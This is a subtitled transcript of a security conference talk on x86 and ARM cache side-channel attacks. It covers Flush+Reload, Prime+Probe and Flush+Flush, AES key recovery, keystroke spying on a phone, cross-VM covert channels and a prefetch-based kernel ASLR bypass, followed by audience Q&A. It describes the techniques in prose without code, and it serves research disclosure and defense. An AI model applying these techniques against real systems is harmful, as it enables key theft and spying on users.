Music
Herald Angel: We are here with a motto,
and the motto of this year is "Works For
Me" and I think, who many people, how many
people in here are programmmers? Raise
your hands or shout or... Whoa, that's a
lot. Okay. So I think many of you will
work on x86. Yeah. And I think you assume
that it works, and that everything works
as intended And I mean: What could go
wrong? Our next talk, the first one today,
will be by Clémentine Maurice, who
previously was here with RowhammerJS,
something I would call scary, and Moritz
Lipp, who has worked on the Armageddon
exploit, back, what is it? Okay, so the
next... I would like to hear a really warm
applause for the speakers for the talk
"What could what could possibly go wrong
with insert x86 instruction here?"
thank you.
Applause
Clémentine Maurice (CM): Well, thank you
all for being here this morning. Yes, this
is our talk "What could possibly go wrong
with insert x86 instructions here". So
just a few words about ourselves: So I'm
Clémentine Maurice, I got my PhD last year
in computer science and I'm now working as
a postdoc at Graz University of Technology
in Austria. You can reach me on Twitter or
by email but there's also I think a lots
of time before the Congress is over.
Moritz Lipp (ML): Hi and my name is Moritz
Lipp, I'm a PhD student at Graz University
of Technology and you can also reach me on
Twitter or just after our talk and in the
next days.
CM: So, about this talk: So, the title
says this is a talk about x86
instructions, but this is not a talk about
software. Don't leave yet! I'm actually
even assuming safe software and the point
that we want to make is that safe software
does not mean safe execution and we have
information leakage because of the
underlying hardware and this is what we're
going to talk about today. So we'll be
talking about cache attacks, what are
they, what can we do with that and also a
special kind of cache attack that we found
this year. So... doing cache attacks
without memory accesses and how to use
that even to bypass kernel ASLR.
So again, the talk says is to talk about
x86 instructions but this is even more
global than that. We can also mount these
cache attacks on ARM and not only on the
x86. So some of the examples that you will
see also applies to ARM. So today we'll do
have a bit of background, but actually
most of the background will be along the
lines because this covers really a huge
chunk of our research, and we'll see
mainly three instructions: So "mov" and
how we can perform these cache attacks,
what are they... The instruction
"clflush", so here we'll be doing cache
attacks without any memory accesses. Then
we'll see "prefetch" and how we can bypass
kernel ASLR and lots of translations
levels, and then there's even a bonus
track, so it's this this will be not our
works, but even more instructions and even
more text.
Okay, so let's start with a bit of an
introduction. So we will be mainly
focusing on Intel CPUs, and this is
roughly in terms of cores and caches, how
it looks like today. So we have different
levels of cores ...uh... different cores
so here four cores, and different levels
of caches. So here usually we have three
levels of caches. We have level 1 and
level 2 that are private to each call,
which means that core 0 can only access
its level 1 and its level 2 and not level
1 and level 2 of, for example, core 3, and
we have the last level cache... so here if
you can see the pointer... So this one is
divided in slices so we have as many
slices as cores, so here 4 slices, but all
the slices are shared across core so core
0 can access the whole last level cache,
that's 0 1 2 & 3. We also have a nice
property on Intel CPUs is that this level
of cache is inclusive, and what it means
is that everything that is contained in
level 1 and level 2 will also be contained
in the last level cache, and this will
prove to be quite useful for cache
attacks.
So today we mostly have set associative
caches. What it means is that we have data
that is loaded in specific sets and that
depends only on its address. So we have
some bits of the address that gives us the
index and that says "Ok the line is going
to be loaded in this cache set", so this
is a cache set. Then we have several ways
per set so here we have 4 ways and the
cacheine is going to be loaded in a
specific way and that will only depend on
the replacement policy and not on the
address itself, so when you load a line
into the cache, usually the cache is
already full and you have to make room for
a new line. So this is where the
replacement replacement policy—this is
what it does—it says ok I'm going to
remove this line to make room for the next
line. So for today we're going to see only
three instruction as I've been telling
you. So the move instruction, it does a
lot of things but the only aspect that
we're interested in about it that can
access data in the main memory.
We're going to see a clflush what it does
is that it removes a cache line from the
cache, from the whole cache. And we're
going to see prefetch, it prefetches a
cache line for future use. So we're going
to see what they do and the kind of side
effects that they have and all the attacks
that we can do with them. And that's
basically all the example you need for
today so even if you're not an expert of
x86 don't worry it's not just slides full
of assembly and stuff. Okay so on to the
first one.
ML: So we will first start with the 'mov'
instruction and actually the first slide
is full of code, however as you can see
the mov instruction is used to move data
from registers to registers, from the main
memory and back to the main memory and as
you can see there are many moves you can
use but basically it's just to move data
and that's all we need to know. In
addition, a lot of exceptions can occur so
we can assume that those restrictions are
so tight that nothing can go wrong when
you just move data because moving data is
simple.
However while there are a lot of
exceptions the data that is accessed is
always loaded into the cache, so data is
in the cache and this is transparent to
the program that is running. However,
there are side-effects when you run these
instructions, and we will see how they
look like with the mov instruction. So you
probably all know that data can either be
in CPU registers, in the different levels
of the cache that Clementine showed to you
earlier, in the main memory, or on the
disk, and depending on where the memory
and the data is located it needs a longer
time to be loaded back to the CPU, and
this is what we can see in this plot. So
we try here to measure the access time of
an address over and over again, assuming
that when we access it more often, it is
already stored in the cache. So around 70
cycles, most of the time we can assume
when we load an address and it takes 70
cycles, it's loaded into the cache.
However, when we assume that the data is
loaded from the main memory, we can
clearly see that it needs a much longer
time like a bit more than 200 cycles. So
depending when we measure the time it
takes to load the address we can say the
data has been loaded to the cache or the
data is still located in the main memory.
And this property is what we can exploit
using cache attacks. So we measure the
timing differences on memory accesses. And
what an attacker does he monitors the
cache lines, but he has no way to know
what's actually the content of the cache
line. So we can only monitor that this
cache line has been accessed and not
what's actually stored in the cache line.
And what you can do with this is you can
implement covert channels, so you can
allow two processes to communicate with
each other evading the permission system
what we will see later on. In addition you
can also do side channel attacks, so you
can spy with a malicious attacking
application on benign processes, and you
can use this to steal cryptographic keys
or to spy on keystrokes.
And basically we have different types of
cache attacks and I want to explain the
most popular one, the "Flush+Reload"
attack, in the beginning. So on the left,
you have the address space of the victim,
and on the right you have the address
space of the attacker who maps a shared
library—an executable—that the victim is
using in to its own address space, like
the red rectangle. And this means that
when this data is stored in the cache,
it's cached for both processes. Now the
attacker can use the flush instruction to
remove the data out of the cache, so it's
not in the cache anymore, so it's also not
cached for the victim. Now the attacker
can schedule the victim and if the victim
decides "yeah, I need this data", it will
be loaded back into the cache. And now the
attacker can reload the data, measure the
time how long it took, and then decide
"okay, the victim has accessed the data in
the meantime" or "the victim has not
accessed the data in the meantime." And by
that you can spy if this address has been
used.
The second type of attack is called
"Prime+Probe" and it does not rely on the
shared memory like the "Flush+Reload"
attack, and it works as following: Instead
of mapping anything into its own address
space, the attacker loads a lot of data
into one cache line, here, and fills the
cache. Now he again schedules the victim
and the schedule can access data that maps
to the same cache set.
So the cache set is used by the attacker
and the victim at the same time. Now the
attacker can start measuring the access
time to the addresses he loaded into the
cache before, and when he accesses an
address that is still in the cache it's
faster so he measures the lower time. And
if it's not in the cache anymore it has to
be reloaded into the cache so it takes a
longer time. He can sum this up and detect
if the victim has loaded data into the
cache as well. So the first thing we want
to show you is what you can do with cache
attacks is you can implement a covert
channel and this could be happening in the
following scenario.
You install an app on your phone to view
your favorite images you take, to apply
some filters, and in the end you don't
know that it's malicious because the only
permission it requires is to access your
images which makes sense. So you can
easily install it without any fear. In
addition you want to know what the weather
is outside, so you install a nice little
weather widget, and the only permission it
has is to access the internet because it
has to load the information from
somewhere. So what happens if you're able
to implement a covert channel between two
these two applications, without any
permissions and privileges so they can
communicate with each other without using
any mechanisms provided by the operating
system, so it's hidden. It can happen that
now the gallery app can send the image to
the internet, it will be uploaded and
exposed for everyone. So maybe you don't
want to see the cat picture everywhere.
While we can do this with those
Prime+Probe/ Flush+Reload attacks, we will
discuss a covert channel using
Prime+Probe. So how can we transmit this
data? We need to transmit ones and zeros
at some point. So the sender and the
receiver agree on one cache set that they
both use. The receiver probes the set all
the time. When the sender wants to
transmit a zero he just does nothing, so
the lines of the receiver are in the cache
all the time, and he knows "okay, he's
sending nothing", so it's a zero.
On the other hand if the sender wants to
transmit a one, he starts accessing
addresses that map to the same cache set
so it will take a longer time for the
receiver to access its addresses again,
and he knows "okay, the sender just sent
me a one", and Clementine will show you
what you can do with this covert channel.
CM: So the really nice thing about
Prime+Probe is that it has really low
requirements. It doesn't need any kind of
shared memory. For example if you have two
virtual machines you could have some
shared memory via memory deduplication.
The thing is that this is highly insecure,
so cloud providers like Amazon ec2, they
disable that. Now we can still use
Prime+Probe because it doesn't need this
shared memory. Another problem with cache
covert channels is that they are quite
noisy. So when you have other applications
that are also running on the system, they
are all competing for the cache and they
might, like, evict some cache lines,
especially if it's an application that is
very memory intensive. And you also have
noise due to the fact that the sender and
the receiver might not be scheduled at the
same time. So if you have your sender that
sends all the things and the receiver is
not scheduled then some part of the
transmission can get lost. So what we did
is we tried to build an error-free covert
channel. We took care of all these noise
issues by using some error detection to
resynchronize the sender and the receiver
and then we use some error correction to
correct the remaining errors.
So we managed to have a completely error-
free covert channel even if you have a lot
of noise, so let's say another virtual
machine also on the machine serving files
through a web server, also doing lots of
memory-intensive tasks at the same time,
and the covert channel stayed completely
error-free, and around 40 to 75 kilobytes
per second, which is still quite a lot.
All of this is between virtual machines on
Amazon ec2. And the really neat thing—we
wanted to do something with that—and
basically we managed to create an SSH
connection really over the cache. So they
don't have any network between
them, but just we are sending the zeros
and the ones and we have an SSH connection
between them. So you could say that cache
covert channels are nothing, but I think
it's a real threat. And if you want to
have more details about this work in
particular, it will be published soon at
NDSS.
So the second application that we wanted
to show you is that we can attack crypto
with cache attacks. In particular we are
going to show an attack on AES and a
special implementation of AES that uses
T-Tables. so that's the fast software
implementation because it uses some
precomputed lookup tables. It's known to
be vulnerable to side-channel attacks
since 2006 by Osvik et al, and it's a one-
round known plaintext attack, so you have
p—or plaintext—and k, your secret key. And
the AES algorithm, what it does is compute
an intermediate state at each round r.
And in the first round, the accessed table
indices are just p XOR k. Now it's a known
plaintext attack, what this means is that
if you can recover the accessed table
indices you've also managed to recover the
key because it's just XOR. So that would
be bad, right, if we could recover these
accessed table indices. Well we can, with
cache attacks! So we did that with
Flush+Reload and with Prime+Probe. On the
x-axis you have the plaintext byte values
and on the y-axis you have the addresses
which are essentially the T table entries.
So a black cell means that we've monitored
the cache line, and we've seen a lot of
cache hits. So basically the blacker it
is, the more certain we are that the
T-Table entry has been accessed. And here
it's a toy example, the key is all-zeros,
but you would basically just have a
different pattern if the key was not all-
zeros, and as long as you can see this
nice diagonal or a pattern then you have
recovered the key. So it's an old attack,
2006, it's been 10 years, everything
should be fixed by now, and you see where
I'm going: it's not. So on Android the
bouncy castle implementation it uses by
default the T-table, so that's bad. Also
many implementations that you can find
online uses pre-computed values, so maybe
be wary about this kind of attacks. The
last application we wanted to show you is
how we can spy on keystrokes.
So for that we will use flush and reload
because it's a really fine grained
attack. We can see very precisely which
cache line has been accessed, and a cache
line is only 64 bytes so it's really not a
lot and we're going to use that to spy on
keystrokes and we even have a small demo
for you.
ML: So what you can see on the screen this
is not on Intel x86 it's on a smartphone,
on the Galaxy S6, but you can also apply
these cache attacks there so that's what
we want to emphasize.
So on the left you see the screen and on
the right we have connected a shell with
no privileges and permissions, so it can
basically be an app that you install
glass bottle falling
from the App Store and on the right we are
going to start our spy tool, and on the
left we just open the messenger app and
whenever the user hits any key on the
keyboard our spy tool takes care of that
and notices that. Also if he presses the
spacebar we can also measure that. If the
user decides "ok, I want to delete the
word" because he changed his mind, we can
also register if the user pressed the
backspace button, so in the end we can see
exactly how long the words were, the user
typed into his phone without any
permissions and privileges, which is bad.
laughs
applause
ML: so enough about the mov instruction,
let's head to clflush.
CM: So the clflush instruction: What it
does is that it invalidates from every
level the cache line that contains the
address that you pass to this instruction.
So in itself it's kind of bad because it
enables the Flush+Reload attacks that we
showed earlier, that was just flush,
reload, and the flush part is done with
clflush. But there's actually more to it,
how wonderful. So there's a first timing
leakage with it, so we're going to see
that the clflush instruction has a
different timing depending on whether the
data that you that you pass to it is
cached or not. So imagine you have a cache
line that is on the level 1 by inclu...
With the inclusion property it has to be
also in the last level cache. Now this is
quite convenient and this is also why we
have this inclusion property for
performance reason on Intel CPUs, if you
want to see if a line is present at all in
the cache you just have to look in the
last level cache. So this is basically
what the clflush instruction does. It goes
to the last last level cache, sees "ok
there's a line, I'm going to flush this
one" and then there's something that tells
ok the line is also present somewhere else
so then it flushes the line in level 1
and/or level 2. So that's slow. Now if you
perform clflush on some data that is not
cached, basically it does the same, goes
to the last level cache, see that there's
no line and there can't be any... This
data can't be anywhere else in the cache
because it would be in the last level
cache if it was anywhere, so it does
nothing and it stop there. So that's fast.
So how exactly fast and slow am I talking
about? So it's actually only a very few
cycles so we did this experiments on
different microarchitecture so Center
Bridge, Ivy Bridge, and Haswell and...
So it different colors correspond to the
different microarchitecture. So first
thing that is already... kinda funny is
that you can see that you can distinguish
the micro architecture quite nicely with
this, but the real point is that you have
really a different zones. The solids...
The solid line is when we performed the
measurement on clflush with the line that
was already in the cache, and the dashed
line is when the line was not in the
cache, and in all microarchitectures you
can see that we can see a difference: It's
only a few cycles, it's a bit noisy, so
what could go wrong? Okay, so exploiting
these few cycles, we still managed to
perform a new cache attacks that we call
"Flush+Flush", so I'm going to explain
that to you: So basically everything that
we could do with "Flush+Reload", we can
also do with "Flush+Flush". We can perform
cover channels and sidechannel attacks.
It's stealthier than previous cache
attacks, I'm going to go back on this one,
and it's also faster than previous cache
attacks. So how does it work exactly? So
the principle is a bit similar to
"Flush+Reload": So we have the attacker
and the victim that have some kind of
shared memory, let's say a shared library.
It will be shared in the cache The
attacker will start by flushing the cache
line then let's the victim perform
whatever it does, let's say encryption,
the victim will load some data into the
cache, automatically, and now the attacker
wants to know again if the victim accessed
this precise cache line and instead of
reloading it is going to flush it again.
And since we have this timing difference
depending on whether the data is in the
cache or not, it gives us the same
information as if we reloaded it, except
it's way faster. So I talked about
stealthiness. So the thing is that
basically these cache attacks and that
also applies to "Rowhammer": They are
already stealth in themselves, because
there's no antivirus today that can detect
them. but some people thought that we
could detect them with performance
counters because they do a lot of cache
misses and cache references that happen
when the data is flushed and when you
reaccess memory. now what we thought is
that yeah but that also not the only
program steps to lots of cache misses and
cache references so we would like to have
a slightly parametric. So these cache
attacks they have a very heavy activity on
the cache but they're also very particular
because there are very short loops of code
if you take flush and reload this just
flush one line reload the line and then
again flush reload that's very short loop
and that creates a very low pressure on
the instruction therapy which is kind of
particular for of cache attacks so what we
decided to do is normalizing the cache
even so the cache misses and cache
references by events that have to do with
the instruction TLB and there we could
manage to detect cache attacks and
Rowhammer without having false positives
so the system metric that I'm going to use
when I talk about stealthiness so we
started by creating a cover channel. First
we wanted to have it as fast as possible
so we created a protocol to evaluates all
the kind of cache attack that we had so
flush+flush, flush+reload, and
prime+probe and we started with a
packet side of 28 doesn't really matter.
We measured the capacity of our covert
channel and flush+flush is around
500 kB/s whereas Flush+Reload
was only 300 kB/s
so Flush+Flush is already quite an
improvement on the speed.
Then we measured the stealth zone at this
speed only Flush+Flush was stealth and
now the thing is that Flush+Flush and
Flush+Reload as you've seen there are
some similarities so for a covert channel
they also share the same center on it is
receivers different and for this one the
center was not stealth for both of them
anyway if you want a fast covert channel
then just try flush+flush that works.
Now let's try to make it stealthy
completely stealthy because if I have the
standard that is not stealth maybe that we
give away the whole attack so we said okay
maybe if we just slow down all the attacks
then there will be less cache hits,
cache misses and then maybe all
the attacks are actually stealthy why not?
So we tried that we slowed down everything
so Flush+Reload and Flash+Flash
are around 50 kB/s now
Prime+Probe is a bit slower because it
takes more time
to prime and probe anything but still
even with this slow down only Flush+Flush
has its receiver stealth and we also
managed to have the sender stealth now so
basically whether you want a fast covert
channel or a stealth covert channel
Flush+Flush is really great.
Now we wanted to also evaluate if it
wasn't too noisy to perform some side
channel attack so we did these side
channels on the AES t-table implementation
the attacks that we have shown you
earlier, so we computed a lot of
encryption that we needed to determine the
upper four bits of a key bytes so here the
lower the better the attack and Flush +
Reload is a bit better so we need only 250
encryptions to recover these bits but
Flush+Flush comes quite, comes quite
close with 350 and Prime+Probe is
actually the most noisy of them all, needs
5... close to 5000 encryptions so we have
around the same performance for
Flush+Flush and Flush+Reload.
Now let's evaluate the stealthiness again.
So what we did here is we perform 256
billion encryptions in a synchronous
attack so we really had the spy and the
victim scattered and we evaluated the
stealthiness of them all and here only
Flush+Flush again is stealth. And while
you can always slow down a covert channel
you can't actually slow down a side
channel because, in a real-life scenario,
you're not going to say "Hey victim, him
wait for me a bit, I am trying to do an
attack here." That won't work.
So there's even more to it but I will need
again a bit of background before
continuing. So I've shown you the
different levels of caches and here I'm
going to focus more on the last-level
cache. So we have here our four slices so
this is the last-level cache and we have
some bits of the address here that
corresponds to the set, but more
importantly, we need to know where in
which slice and address is going to be.
And that is given, that is given by some
bits of the set and the type of the
address that are passed into a function
that says in which slice the line is going
to be.
Now the thing is that this hash function
is undocumented by Intel. Wouldn't be fun
otherwise. So we have this: As many slices
as core, an undocumented hash function
that maps a physical address to a slice,
and while it's actually a bit of a pain
for attacks, it has, it was not designed
for security originally but for
performance, because you want all the
access to be evenly distributed in the
different slices, for performance reasons.
So the hash function basically does, it
takes some bits of the physical address
and output k bits of slice, so just one
bits if you have a two-core machine, two
bits if you have a four-core machine and
so on. Now let's go back to clflush, see
what's the relation with that.
So the thing that we noticed is that
clflush is actually faster to reach a line
on the local slice.
So if you have, if you're flushing always
one line and you run your program on core
zero, core one, core two and core three,
you will observe that one core in
particular on, when you run the program on
one core, the clflush is faster. And so
here this is on core one, and you can see
that core zero, two, and three it's, it's
a bit slower and here we can deduce that,
so we run the program on core one and we
flush always the same line and we can
deduce that the line belong to slice one.
And what we can do with that is that we
can map physical address to slices.
And that's one way to reverse-engineer
this addressing function that was not
documented.
Funnily enough that's not the only way:
What I did before that was using the
performance counters to reverse-engineer
this function, but that's actually a whole
other story and if you want more detail on
that, there's also an article on that.
ML: So the next instruction we want to
talk about is the prefetch instruction.
And the prefetch instruction is used to
tell the CPU: "Okay, please load the data
I need later on, into the cache, if you
have some time." And in the end there are
actually six different prefetch
instructions: prefetcht0 to t2 which
means: "CPU, please load the data into the
first-level cache", or in the last-level
cache, whatever you want to use, but we
spare you the details because it's not so
interesting in the end.
However, what's more interesting is when
we take a look at the Intel manual and
what it says there. So, "Using the
PREFETCH instruction is recommended only
if data does not fit in the cache." So you
can tell the CPU: "Please load data I want
to stream into the cache, so it's more
performant." "Use of software prefetch
should be limited to memory addresses that
are managed or owned within the
application context."
So one might wonder what happens if this
address is not managed by myself. Sounds
interesting. "Prefetching to addresses
that are not mapped to physical pages can
experience non-deterministic performance
penalty. For example specifying a NULL
pointer as an address for prefetch can
cause long delays."
So we don't want to do that because our
program will be slow. So, let's take a
look what they mean with non-deterministic
performance penalty, because we want to
write good software, right? But before
that, we have to take a look at a little
bit more background information to
understand the attacks.
So on modern operating systems, every
application has its own virtual address
space. So at some point, the CPU needs to
translate these addresses to the physical
addresses actually in the DRAM. And for
that we have this very complex-looking
data structure. So we have a 48-bit
virtual address, and some of those bits
mapped to a table, like the PM level 4
table, with 512 entries, so depending on
those bits the CPU knows, at which line he
has to look.
And if there is data there, because the
address is mapped, he can proceed and look
at the page directory, point the table,
and so on for the town. So is everything,
is the same for each level until you come
to your page table, where you have
4-kilobyte pages. So it's in the end not
that complicated, but it's a bit
confusing, because you want to know a
physical address, so you have to look it
up somewhere in the, in the main memory
with physical addresses to translate your
virtual addresses. And if you have to go
through all those levels, it needs a long
time, so we can do better than that and
that's why Intel introduced additional
caches, also for all of those levels. So,
if you want to translate an address, you
take a look at the ITLB for instructions,
and the data TLB for data. If it's there,
you can stop, otherwise you go down all
those levels and if it's not in any cache
you have to look it up in the DRAM. In
addition, the address space you have is
shared, because you have, on the one hand,
the user memory and, on the other hand,
you have mapped the kernel for convenience
and performance also in the address space.
And if your user program wants to access
some kernel functionality like reading a
file, it will switch to the kernel memory
there's a privilege escalation, and then
you can read the file, and so on. So,
that's it. However, you have drivers in
the kernel, and if you know the addresses
of those drivers, you can do code-reuse
attacks, and as a countermeasure, they
introduced address-space layout
randomization, also for the kernel.
And this means that when you have your
program running, the kernel is mapped at
one address and if you reboot the machine
it's not on the same address anymore but
somewhere else. So if there is a way to
find out at which address the kernel is
loaded, you have circumvented this
countermeasure and defeated kernel address
space layout randomization. So this would
be nice for some attacks. In addition,
there's also the kernel direct physical
map. And what does this mean? It's
implemented on many operating systems like
OS X, Linux, also on the Xen hypervisor
and
BSD, but not on Windows. But what it means
is that the complete physical memory is
mapped in additionally in the kernel
memory at a fixed offset. So, for every
page that is mapped in the user space,
there's something like a twin page in the
kernel memory, which you can't access
because it's in the kernel memory.
However, we will need it later, because
now we go back to prefetch and see what we
can do with that. So, prefetch is not a
usual instruction, because it just tells
the CPU "I might need that data later on.
If you have time, load for me," if not,
the CPU can ignore it because it's busy
with other stuff. So, there's no necessity
that this instruction is really executed,
but most of the time it is. And a nice,
interesting thing is that it generates no
faults, so whatever you pass to this
instruction, your program won't crash, and
it does not check any privileges, so I can
also pass an kernel address to it and it
won't say "No, stop, you accessed an
address that you are not allowed to
access, so I crash," it just continues,
which is nice.
The second interesting thing is that the
operand is a virtual address, so every
time you execute this instruction, the CPU
has to go and check "OK, what physical
address does this virtual address
correspond to?" So it has to do the lookup
with all those tables we've seen earlier,
and as you probably have guessed already,
the execution time varies also for the
prefetch instruction and we will see later
on what we can do with that.
So, let's get back to the direct physical
map. Because we can create an oracle for
address translation, so we can find out
what physical address belongs to the
virtual address. Because nowadays you
don't want that the user to know, because
you can craft nice rowhammer attacks with
that information, and more advanced cache
attacks, so you restrict this information
to the user. But let's check if we find a
way to still get this information. So, as
I've told you earlier, if you have a
paired page in the user space map,
you have the twin page in the kernel
space, and if it's cached,
its cached for both of them again.
So, the attack now works as the following:
From the attacker you flush your user
space page, so it's not in the cache for
the... also for the kernel memory, and
then you call prefetch on the address of
the kernel, because as I told you, you
still can do that because it doesn't
create any faults. So, you tell the CPU
"Please load me this data into the cache
even if I don't have access to this data
normally."
And if we now measure on our user space
page the address again, and we measure a
cache hit, because it has been loaded by
the CPU into the cache, we know exactly at
which position, since we passed the
address to the function, this address
corresponds to. And because this is at a
fixed offset, we can just do a simple
subtraction and know the physical address
again. So we have a nice way to find
physical addresses for virtual addresses.
And in practice this looks like this
following plot. So, it's pretty simple,
because we just do this for every address,
and at some point we measure a cache hit.
So, there's a huge difference. And exactly
at this point we know this physical
address corresponds to our virtual
address. The second thing is that we can
exploit the timing differences it needs
for the prefetch instruction. Because, as
I told you, when you go down this cache
levels, at some point you see "it's here"
or "it's not here," so it can abort early.
And with that we can know exactly
when the prefetch
instruction aborted, and know how the
pages are mapped into the address space.
So, the timing depends on where the
translation stops. And using those two
properties and those information, we can
do the following: On the one hand, we can
build variants of cache attacks. So,
instead of Flush+Reload, we can do
Flush+Prefetch, for instance. We can
also use prefetch to mount rowhammer
attacks on privileged addresses, because
it doesn't do any faults when we pass
those addresses, and it works as well. In
addition, we can use it to recover the
translation levels of a process, which you
could do earlier with the page map file,
but as I told you it's now privileged, so
you don't have access to that, and by
doing that you can bypass address space
layout randomization. In addition, as I
told you, you can translate virtual
addresses to physical addresses, which is
now also privileged with the page map
file, and using that it reenables return
to direct exploits, which have been
demonstrated last year. On top of that, we
can also use this to locate kernel
drivers, as I told you. It would be nice
if we can circumvent KSLR as well, and I
will show you now how this is possible.
So, with the first oracle we find out all
the pages that are mapped, and for each of
those pages, we evict the translation
caches, and we can do that by either
calling sleep,
which schedules another program, or access
just a large memory buffer. Then, we
perform a syscall to the driver. So,
there's code of the driver executed and
loaded into the cache, and then we just
measure the time prefetch takes on this
address. And in the end, the fastest
average access time is the driver page.
So, we can mount this attack on Windows 10
in less than 12 seconds. So, we can defeat
KSLR in less than 12 seconds, which is
very nice. And in practice, the
measurements looks like the following: So,
we have a lot of long measurements, and at
some point you have a low one, and you
know exactly that this driver region and
the address the driver is located. And
you can mount those read to direct
attacks again. However, that's not
everything, because there are more
instructions in Intel.
CM: Yeah, so, the following is not our
work, but we thought that would be
interesting, because it's basically more
instructions, more attacks, more fun. So
there's the RDSEED instruction, and what
it does, that is request a random seed to
the hardware random number generator. So,
the thing is that there is a fixed number
of precomputed random bits, and that takes
time to regenerate them. So, as everything
that takes time, you can create a covert
channel with that. There is also FADD and
FMUL, which are floating point operations.
Here, the running time of this instruction
depends on the operands. Some people
managed to bypass Firefox's same origin
policy with an SVG filter timing attack
with that. There's also the JMP
instructions. So, in modern CPUs you have
branch prediction, and branch target
prediction. With that, it's actually been
studied a lot, you can create a covert
channel. You can do side-channel attacks
on crypto. You can also bypass KSLR, and
finally, there are TSX instructions, which
is an extension for hardware transactional
memory support, which has also been used
to bypass KSLR. So, in case you're not
sure, KSLR is dead. You have lots of
different things to read. Okay, so, on the
conclusion now. So, as you've seen, it's
actually more a problem of CPU design,
than really the instruction sets
architecture. The thing is that all these
issues are really hard to patch. They
are all linked to performance
optimizations, and we are not getting rid
of performance optimization. That's
basically a trade-off between performance
and security, and performance seems to
always win. There has been some
propositions to... against cache attacks,
to... let's say remove the CLFLUSH
instructions. The thing is that all these
quick fix won't work, because we always
find new ways to do the same thing without
these precise instructions and also, we
keep finding new instruction that leak
information. So, it's really, let's say
quite a big topic that we have to fix
this. So, thank you very much for your
attention. If you have any questions we'd
be happy to answer them.
applause
applause
Herald: Okay. Thank you very much again
for your talk, and now we will have a Q&A,
and we have, I think, about 15 minutes, so
you can start lining up behind the
microphones. They are in the gangways in
the middle. Except, I think that one...
oh, no, it's back up, so it will work. And
while we wait, I think we will take
questions from our signal angel, if there
are any. Okay, there aren't any, so...
microphone questions. I think, you in
front.
Microphone: Hi. Can you hear me?
Herald: Try again.
Microphone: Okay. Can you hear me now?
Okay. Yeah, I'd like to know what exactly
was your stealthiness metric? Was it that
you can't distinguish it from a normal
process, or...?
CM: So...
Herald: Wait a second. We have still Q&A,
so could you quiet down a bit? That would
be nice.
CM: So, the question was about the
stealthiness metric. Basically, we use the
metric with cache misses and cache
references, normalized by the instructions
TLB events, and we
just found the threshold under which
pretty much every benign application was
below this, and rowhammer and cache
attacks were after that. So we fixed the
threshold, basically.
H: That microphone.
Microphone: Hello. Thanks for your talk.
It was great. First question: Did you
inform Intel before doing this talk?
CM: Nope.
Microphone: Okay. The second question:
What's your future plans?
CM: Sorry?
M: What's your future plans?
CM: Ah, future plans. Well, what I did,
that is interesting, is that we keep
finding these more or less by accident, or
manually, so having a good idea of what's
the attack surface here would be a good
thing, and doing that automatically would
be even better.
M: Great, thanks.
H: Okay, the microphone in the back,
over there. The guy in white.
M: Hi. One question. If you have,
like, a demon, that randomly invalidates
some cache lines, would that be a better
countermeasure than disabling the caches?
ML: What was the question?
CM: If invalidating cache lines would be
better than disabling the whole cache. So,
I'm...
ML: If you know which cache lines have
been accessed by the process, you can
invalidate those cache lines before you
swap those processes, but it's also a
trade-off between performance. Like, you
can also, if you switch processes, flush
the whole cache, and then it's empty, and
then you don't see any activity anymore,
but there's also the trade-off of
performance with this.
M: Okay, maybe a second question. If you,
there are some ARM architectures
that have random cache line invalidations.
Did you try those, if you can see a
[unintelligible] channel there.
ML: If they're truly random, but probably
you just have to make more measurements
and more measurements, and then you can
average out the noise, and then you can do
these attacks again. It's like, with prime
and probe, where you need more
measurements, because it's much more
noisy, so in the end you will just need
much more measurements.
CM: So, on ARM, it's supposed to be pretty
random. At least it's in the manual, but
we actually found nice ways to evict cache
lines, that we really wanted to evict, so
it's not actually that pseudo-random.
So, even... let's say, if something is
truly random, it might be nice, but then
it's also quite complicated to implement.
I mean, you probably don't want a random
number generator just for the cache.
M: Okay. Thanks.
H: Okay, and then the three guys here on
the microphone in the front.
M: My question is about a detail with the
keylogger. You could distinguish between
space, backspace and alphabet, which is
quite interesting. But could you also
figure out the specific keys that were
pressed, and if so, how?
ML: Yeah, that depends on the
implementation of the keyboard. But what
we did, we used the Android stock
keyboard, which is shipped with the
Samsung, so it's pre-installed. And if you
have a table somewhere in your code, which
says "Okay, if you press this exact
location or this image, it's an A or it's
an B", then you can also do a more
sophisticated attack. So, if you find any
functions or data in the code, which
directly tells you "Okay, this is this
character," you can also spy on the actual
key characters on the keyboard.
M: Thank you.
M: Hi. Thank you for your talk. My first
question is: What can we actually do now,
to mitigate this kind of attack? By, for
example switching off TSX or using ECC
RAM.
CM: So, I think the very important thing
to protect would be, like crypto, and the
good thing is that today we know how to
build crypto that is resistant to side-
channel attacks. So the good thing would
be to stop improving implementation that
are known to be vulnerable for 10 years.
Then things like keystrokes is way harder
to protect, so let's say crypto is
manageable; the whole system is clearly
another problem. And you can have
different types of countermeasure on the
hardware side but it does would mean that
Intel an ARM actually want to fix that,
and that they know how to fix that. I
don't even know how to fix that in
hardware. Then on the system side, if you
prevent some kind of memory sharing, you
don't have flush involved anymore
and primum (?) probably is much more
noisier, so it would be an improvement.
M: Thank you.
H: Do we have signal angel questions? No.
OK, then more microphone.
M: Hi, thank you. I wanted to ask about
the way you establish the side-channel
between the two processors, because it
would obviously have to be timed in a way to
transmit information between one process
to the other. Is there anywhere that you
documented the whole? You know, it's
actually almost like the seven layers or
something like that. There are any ways
that you documented that? It would be
really interesting to know how it worked.
ML: You can find this information in the
paper because there are several papers on
covered channels using that, so the NDSS
paper is published in February I guess,
but the Armageddon paper also includes
a cover channel, and you can
find more information about how the
packets look like and how the
synchronization works in the paper.
M: Thank you.
H: One last question?
M: Hi! You mentioned that you used Osvik's
attack for the AES side-channel attack.
Did you solve the AES round detection and
is it different to some scheduler
manipulation?
CM: So on this one I think we only did
some synchronous attack, so we already
knew when
the victim is going to be scheduled and
we didn't have anything to do with
schedulers.
M: Alright, thank you.
H: Are there any more questions? No, I
don't see anyone. Then, thank you very
much again to our speakers.
applause
music
subtitles created by c3subtitles.de
in the year 2020. Join, and help us!